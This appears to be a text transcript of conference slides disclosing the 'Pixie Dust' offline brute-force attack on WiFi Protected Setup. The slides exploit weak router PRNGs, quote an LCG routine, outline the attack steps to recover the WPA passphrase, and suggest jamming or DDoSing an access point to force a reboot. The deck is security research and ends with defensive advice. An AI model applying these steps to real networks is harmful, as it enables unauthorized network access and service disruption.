WPS_offline_bruteforce_RNG_Dominique_Bongard.pdf
Transcript of WPS_offline_bruteforce_RNG_Dominique_Bongard.pdf
![Page 1: WPS_offline_bruteforce_RNG_Dominique_Bongard.pdf](https://reader034.fdocuments.in/reader034/viewer/2022051402/5695d3dc1a28ab9b029f74af/html5/thumbnails/1.jpg)
Offline bruteforce attack on WiFi Protected Setup
Dominique Bongard Founder 0xcite, Switzerland @reversity
![Page 2: WPS_offline_bruteforce_RNG_Dominique_Bongard.pdf](https://reader034.fdocuments.in/reader034/viewer/2022051402/5695d3dc1a28ab9b029f74af/html5/thumbnails/2.jpg)
§ Protocol aiming at easily connecting to protected WiFi networks
§ Two main modes: Push-Button and 8 digit PIN code
§ Gives the WPA passphrase to stations providing the right PIN
§ Poor design and implementation
![Page 3: WPS_offline_bruteforce_RNG_Dominique_Bongard.pdf](https://reader034.fdocuments.in/reader034/viewer/2022051402/5695d3dc1a28ab9b029f74af/html5/thumbnails/3.jpg)
![Page 4: WPS_offline_bruteforce_RNG_Dominique_Bongard.pdf](https://reader034.fdocuments.in/reader034/viewer/2022051402/5695d3dc1a28ab9b029f74af/html5/thumbnails/4.jpg)
![Page 5: WPS_offline_bruteforce_RNG_Dominique_Bongard.pdf](https://reader034.fdocuments.in/reader034/viewer/2022051402/5695d3dc1a28ab9b029f74af/html5/thumbnails/5.jpg)
Stefan Viehböck
![Page 6: WPS_offline_bruteforce_RNG_Dominique_Bongard.pdf](https://reader034.fdocuments.in/reader034/viewer/2022051402/5695d3dc1a28ab9b029f74af/html5/thumbnails/6.jpg)
Stefan Viehböck
![Page 7: WPS_offline_bruteforce_RNG_Dominique_Bongard.pdf](https://reader034.fdocuments.in/reader034/viewer/2022051402/5695d3dc1a28ab9b029f74af/html5/thumbnails/7.jpg)
§ Brute force each half of the PIN
§ Maximum 10‘000 tries + 1‘000 tries
§ No limitation on number of tries in many AP
§ Takes a few hours (depends on the AP)
§ Largely slowed down in new devices (lock-out)
§ Many AP still sold with WPS PIN activated
![Page 8: WPS_offline_bruteforce_RNG_Dominique_Bongard.pdf](https://reader034.fdocuments.in/reader034/viewer/2022051402/5695d3dc1a28ab9b029f74af/html5/thumbnails/8.jpg)
![Page 9: WPS_offline_bruteforce_RNG_Dominique_Bongard.pdf](https://reader034.fdocuments.in/reader034/viewer/2022051402/5695d3dc1a28ab9b029f74af/html5/thumbnails/9.jpg)
STA Nonce E-Hash1 E-Hash2 HMAC
AES(HMAC(PIN1),E-S1) AES(HMAC(PIN2),E-S2)
![Page 10: WPS_offline_bruteforce_RNG_Dominique_Bongard.pdf](https://reader034.fdocuments.in/reader034/viewer/2022051402/5695d3dc1a28ab9b029f74af/html5/thumbnails/10.jpg)
§ If we can guess E-S1 and E-S2, we can the brute force PIN1 and PIN2 offline!
§ Pixie dust attack!
![Page 11: WPS_offline_bruteforce_RNG_Dominique_Bongard.pdf](https://reader034.fdocuments.in/reader034/viewer/2022051402/5695d3dc1a28ab9b029f74af/html5/thumbnails/11.jpg)
§ Usually with pseudo-random generators (PRNG)
§ Often insecure PRNG § No or low entropy § Small state (32 bits)
§ Can the PRNG state be recovered ?
![Page 12: WPS_offline_bruteforce_RNG_Dominique_Bongard.pdf](https://reader034.fdocuments.in/reader034/viewer/2022051402/5695d3dc1a28ab9b029f74af/html5/thumbnails/12.jpg)
int rand_r( unsigned int *seed ) { unsigned int s=*seed; unsigned int uret; s = (s * 1103515245) + 12345; // permutate seed uret = s & 0xffe00000; // Only use top 11 bits
s = (s * 1103515245) + 12345; // permutate seed uret += (s & 0xfffc0000) >> 11; // Only use top 14 bits s = (s * 1103515245) + 12345; // permutate seed uret += (s & 0xfe000000) >> (11+14); // Only use top 7 bits retval = (int)(uret & RAND_MAX); *seed = s; return retval; }
![Page 13: WPS_offline_bruteforce_RNG_Dominique_Bongard.pdf](https://reader034.fdocuments.in/reader034/viewer/2022051402/5695d3dc1a28ab9b029f74af/html5/thumbnails/13.jpg)
AP Nonce Description PK
![Page 14: WPS_offline_bruteforce_RNG_Dominique_Bongard.pdf](https://reader034.fdocuments.in/reader034/viewer/2022051402/5695d3dc1a28ab9b029f74af/html5/thumbnails/14.jpg)
§ Linear Congruential Generator
§ 32 bits state
§ No external entropy
§ E-S1 and E-S2 generated right after the Nonce
![Page 15: WPS_offline_bruteforce_RNG_Dominique_Bongard.pdf](https://reader034.fdocuments.in/reader034/viewer/2022051402/5695d3dc1a28ab9b029f74af/html5/thumbnails/15.jpg)
§ Do the WPS protocol up to message M3
§ Get the Nonce from M1 § Bruteforce the state of the PRNG
§ Compute E-S1 and E-S2 from the state
§ Decrypt E-Hash1 and E-Hash2
§ Bruteforce Pin1 and Pin2
§ Do the full WPS protocol and get the passphrase
![Page 16: WPS_offline_bruteforce_RNG_Dominique_Bongard.pdf](https://reader034.fdocuments.in/reader034/viewer/2022051402/5695d3dc1a28ab9b029f74af/html5/thumbnails/16.jpg)
§ Linear Feedback Shift Register (LFSR)
§ Broken
§ Doesn‘t matter the keys are always NULL !!
![Page 17: WPS_offline_bruteforce_RNG_Dominique_Bongard.pdf](https://reader034.fdocuments.in/reader034/viewer/2022051402/5695d3dc1a28ab9b029f74af/html5/thumbnails/17.jpg)
§ Some AP have the same state at each boot
§ Make a list of common states after reboot
§ Attack the AP right after boot
![Page 18: WPS_offline_bruteforce_RNG_Dominique_Bongard.pdf](https://reader034.fdocuments.in/reader034/viewer/2022051402/5695d3dc1a28ab9b029f74af/html5/thumbnails/18.jpg)
§ Trigger the breakers § DDOS the AP
§ Jam the signal until the target reboots the AP
![Page 19: WPS_offline_bruteforce_RNG_Dominique_Bongard.pdf](https://reader034.fdocuments.in/reader034/viewer/2022051402/5695d3dc1a28ab9b029f74af/html5/thumbnails/19.jpg)
§ Looks okay
§ Uses /dev/random
§ Found in Atheros SDK
§ But you never know § Several papers attack the entropy of the linux
PRNG in embedded systems
![Page 20: WPS_offline_bruteforce_RNG_Dominique_Bongard.pdf](https://reader034.fdocuments.in/reader034/viewer/2022051402/5695d3dc1a28ab9b029f74af/html5/thumbnails/20.jpg)
§ It‘s complicated
§ Many of the implementations are the reference code for the chipset
§ Only the GUI is reskinned § Therefore many brands are affected
§ Many vendors use different chipset § Even for the same model number
![Page 21: WPS_offline_bruteforce_RNG_Dominique_Bongard.pdf](https://reader034.fdocuments.in/reader034/viewer/2022051402/5695d3dc1a28ab9b029f74af/html5/thumbnails/21.jpg)
§ Disable WPS now !
§ Reverse engineers: Check other AP for bad PRNG
§ Cryptographers: Check if good PRNG are okay